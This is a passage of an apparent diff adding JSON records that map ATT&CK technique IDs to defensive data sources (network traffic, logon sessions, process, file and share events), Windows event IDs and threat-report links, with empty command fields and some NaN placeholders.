+ "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + 
"https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://securelist.com/operation-daybreak/75100/", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1192", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "Packet capture" + ], + [ + "Web proxy" + ], + [ + "Email gateway" + ], + [ + "Detonation chamber" + ], + [ + "SSL/TLS inspection" + ], + [ + "DNS records" + ], + [ + "Mail server" + ], + [ + "Packet capture" + ], + [ + "Web proxy" + ], + [ + "Email gateway" + ], + [ + "Detonation chamber" + ], + [ + "SSL/TLS inspection" + ], + [ + "DNS records" + ], + [ + "Mail server" + ] + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + 
"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://www.justice.gov/file/1080281/download", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1194", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + 
"possible_detections": [ + [ + "SSL/TLS inspection" + ], + [ + "Anti-virus" + ], + [ + "Web proxy" + ], + [ + "SSL/TLS inspection" + ], + [ + "Anti-virus" + ], + [ + "Web proxy" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + { + "technique_id": "T1199", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "Application Logs" + ], + [ + "Authentication logs" + ], + [ + "Third-party application logs" + ], + [ + "Application Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Third-party application logs" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved 
information about", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was 
created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1017", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ] + }, + { + "technique_id": "T1097", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4624", + "Authentication logs" + ], + [ + "4624", + "Authentication logs" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1051", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + 
"4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1080", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + 
"relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + } + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ] + ] + }, + { + "technique_id": "T1062", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "System calls" + ], + [ + "System calls" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1019", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "BIOS" + ], + [ + "EFI" + ], + [ + "API monitoring" + ], + [ + "BIOS" + ], + [ + "EFI" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1492", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1334", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1272", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + 
"https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + ] + }, + { + "technique_id": "T1487", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + { + "technique_id": "T1494", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1493", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1342", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ] + }, + { + "technique_id": "T1341", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ] + }, + { + "technique_id": "T1480", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + 
"definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script 
